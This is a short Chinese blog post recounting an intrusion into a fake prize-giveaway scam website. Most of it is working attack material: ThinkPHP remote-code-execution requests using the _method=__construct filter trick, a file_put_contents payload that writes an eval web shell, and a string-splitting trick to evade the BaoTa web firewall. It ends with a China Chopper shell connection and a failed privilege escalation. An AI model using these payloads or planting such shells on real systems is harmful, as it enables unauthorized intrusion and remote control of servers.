抽奖诈骗网站的渗透


网站是这样的,他是利用短视频发布免费皮肤领取的视频,扫码进入这个网页,然后扫码进群再进行诈骗。

报错判断为think PHP框架

试试RCE

POST:

http://xxxx.xxxx.com/?s=index/index/

s=-1&_method=__construct&method=get&filter[]=phpinfo

为php5,尝试写shell

POST

http://xxx.xxx.com/?s=index/index

s=file_put_contents('1.php','<?php eval($_POST[x])?>')&_method=__construct&method=POST&filter[]=assert

宝塔waf

经过多次实验,宝塔应该是拦截了_POST[关键字,下面我们尝试绕过

在php里面我们可以使用'.'拼接符来连接前后的语句

<?php ev'.'al($_PO'.'ST[x])?>相当于<?php eval($_POST[x])?>

POST:

http://xxx.xxx.com/?s=index/index

s=file_put_contents('1.php','<?php ev'.'al($_PO'.'ST[x])?>')&_method=__construct&method=POST&filter[]=assert

写shell成功

访问http://xxx.xx/1.php

菜刀连接成功

宝塔限制的太死了,提权不了


可控文件拿shell

文件上传漏洞 部分解析后缀

获取更多资讯请加入交流群


    协助本站SEO优化一下,谢谢!
    关键词不能为空
评 论
更换验证码